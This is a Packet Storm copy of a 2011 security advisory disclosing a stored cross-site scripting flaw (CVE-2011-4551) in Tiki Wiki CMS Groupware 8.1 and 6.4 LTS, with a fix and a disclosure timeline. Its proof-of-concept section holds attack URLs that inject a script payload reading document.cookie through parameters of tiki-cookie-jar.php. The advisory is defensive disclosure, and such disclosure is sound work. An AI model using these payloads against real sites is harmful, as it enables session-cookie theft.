exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Tiki Wiki CMS Groupware 8.1 / 6.4 LTS Cross Site Scripting

Tiki Wiki CMS Groupware 8.1 / 6.4 LTS Cross Site Scripting
Posted Dec 20, 2011
Authored by Stefan Schurtz

Tiki Wiki CMS Groupware versions 8.1 and 6.4 LTS suffer from a stored cross site scripting vulnerability.

tags | exploit, xss
advisories | CVE-2011-4551
SHA-256 | b6a4a107433a40e17f0035aef8bc745879ef539726e9eb3576090bc83cbb1b15

Tiki Wiki CMS Groupware 8.1 / 6.4 LTS Cross Site Scripting

Change Mirror Download
Advisory:    Tiki Wiki CMS Groupware Stored Cross-Site-Scripting
Advisory ID: INFOSERVE-ADV2011-07
Author: Stefan Schurtz
Contact: security@infoserve.de
Affected Software: Successfully tested on Tiki 8.1 & 6.4 LTS (affects all current releases)
Vendor URL: http://info.tiki.org/
Vendor Status: fixed
CVE-ID: CVE-2011-4551

==========================
Vulnerability Description
==========================

All current releases of Tiki Wiki are prone to a stored XSS vulnerability

==================
PoC-Exploit
==================

Tested with Firefox 7.01

Visit this URL

http://<target>/tiki-8.1/tiki-cookie-jar.php?show_errors=y&xss=</style></script><script>alert(document.cookie)</script> -> blank site

But when you visit one of this pages, the XSS will be executed

http://<target>/tiki-8.1/tiki-login.php
http://<target>/tiki-8.1/tiki-remind_password.php

// browser source code

show_errors: 'y',
xss: '</style></script><script>alert(document.cookie)</script>'
};

Another example:

http://<target>/tiki-8.1/tiki-cookie-jar.php?show_errors=y&xss1=</style></script><script>alert(document.cookie)</script>
http://<target>/tiki-8.1/tiki-cookie-jar.php?show_errors=y&xss2=</style></script><script>alert(document.cookie)</script>
http://<target>/tiki-8.1/tiki-cookie-jar.php?show_errors=y&xss3=</style></script><script>alert(document.cookie)</script>

All of them will be executed!

// browser source code

show_errors: 'y',
xss1: '</style></script><script>alert(document.cookie)</script>',
xss2: '</style></script><script>alert(document.cookie)</script>',
xss3: '</style></script><script>alert(document.cookie)</script>'
};

=========
Solution
=========

Upgrade to Tiki 8.2 or 6.5 LTS

====================
Disclosure Timeline
====================

16-Nov-2011 - informed Security Team (security@tikiwiki.org)
19-Dec-2011 - fixed by vendor

========
Credits
========

Vulnerabilitiy found and advisory written by the INFOSERVE security team.

===========
References
===========

http://info.tiki.org/article183-Tiki-Wiki-CMS-Groupware-8-2-and-6-5LTS-Security-Patches-Available
http://www.infoserve.de/system/files/advisories/INFOSERVE-ADV2011-07.txt
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close